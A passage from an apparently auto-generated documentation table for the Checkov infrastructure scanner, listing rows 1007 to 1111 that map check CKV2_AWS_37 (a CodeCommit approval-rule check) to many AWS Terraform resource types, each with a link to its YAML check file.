[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1008 | CKV2_AWS_37 | resource | 
aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1009 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1010 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1011 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1012 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1013 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1014 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1015 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1016 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1017 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1018 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1019 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1020 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1021 | CKV2_AWS_37 | resource | aws_sagemaker_model | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1022 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1023 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1024 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1025 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1026 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1027 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1028 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1029 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1030 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1031 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1032 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1033 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1034 | CKV2_AWS_37 | resource | 
aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1035 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1036 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1037 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1038 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1039 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1040 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1041 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1042 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1043 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1044 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1045 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1046 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1047 | CKV2_AWS_37 | resource | 
aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1048 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1049 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1050 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1051 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1052 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1053 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1054 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1055 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1056 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1057 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1058 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1059 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1060 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1061 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1062 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1063 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1064 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1065 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1066 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1067 | CKV2_AWS_37 | 
resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1068 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1069 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1070 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1071 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1072 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1073 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1074 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1075 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1076 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1077 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1078 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1079 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1080 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1081 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1082 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1083 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1084 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1085 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1086 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| -| 1087 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1088 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1089 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1090 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1091 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1092 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1093 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1094 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1095 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1096 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1097 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1098 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1099 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1100 | 
CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1101 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1102 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1103 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1104 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1105 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1106 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1107 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1108 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1109 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1110 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1111 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | 